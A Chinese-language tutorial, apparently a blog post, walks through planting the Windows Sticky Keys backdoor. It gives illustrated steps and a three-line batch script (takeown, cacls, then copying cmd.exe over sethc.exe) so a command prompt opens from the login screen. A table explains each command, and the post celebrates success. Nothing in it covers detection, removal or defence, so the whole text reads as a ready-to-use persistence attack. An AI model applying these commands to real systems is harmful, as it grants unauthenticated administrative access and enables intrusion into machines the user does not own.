介绍
粘滞键后门是一种恶意软件攻击技术,它利用了操作系统中的一个特性,即将键盘上的某个按键设置为"粘滞",即按下一次后会一直保持按下的状态,直到再次按下该键。攻击者可以利用这个特性来创建一个后门,使受害者的系统在不知情的情况下执行恶意操作。
图形化界面复现过程
一、狸猫换太子
1. 将C:\Windows\System32目录下的sethc.exe文件更名为sethc.exe.bak,用作备份文件。
①右键sethc.exe文件,选择属性,然后如图操作
②在sethc.exe的高级安全设置界面,如图操作
③将当前所有者从更改为我们的管理员账号
④确定更改后,继续点击确定
⑤回到sethc.exe属性界面处,点击编辑,对权限进行更改
⑥权限勾选上完全控制,然后确定保存退出
⑦更改文件名为【sethc.exe.bak】
2. 在C:\Windows\System32目录下找到【cmd.exe】文件,将其复制出一个副本文件
3. 更改【cmd-副本.exe】文件名为【sethc.exe】
二、测试
大功告成!
即便在用户登录界面,依旧能启用:
bat文件快速复现过程
takeown /F C:\Windows\System32\sethc.exe /A
cacls C:\Windows\System32\sethc.exe /E /G administrators:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
命令 | 作用 |
---|---|
takeown /F C:\Windows\System32\sethc.exe /A | 这个命令使用 takeown 工具,试图将 C:\Windows\System32\sethc.exe 文件的所有权设置为管理员(/A 表示所有管理员)。这样一来,攻击者可以获取对该文件的控制权。 |
cacls C:\Windows\System32\sethc.exe /E /G administrators:F | 这个命令使用 cacls 工具,试图修改 C:\Windows\System32\sethc.exe 文件的访问控制列表(ACL),将管理员(administrator)的权限设置为完全控制(/G 参数表示授权)。这将使攻击者可以完全控制该文件。 |
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe | 这个命令试图将 C:\Windows\System32\cmd.exe (命令提示符)复制到 C:\Windows\System32\sethc.exe ,覆盖原来的 sethc.exe 文件。通过这种方式,攻击者将命令提示符覆盖了 Sticky Keys 功能,实际上将命令提示符与 Sticky Keys 绑定在一起,从而在登录屏幕上执行命令。 |
测试:
大功告成!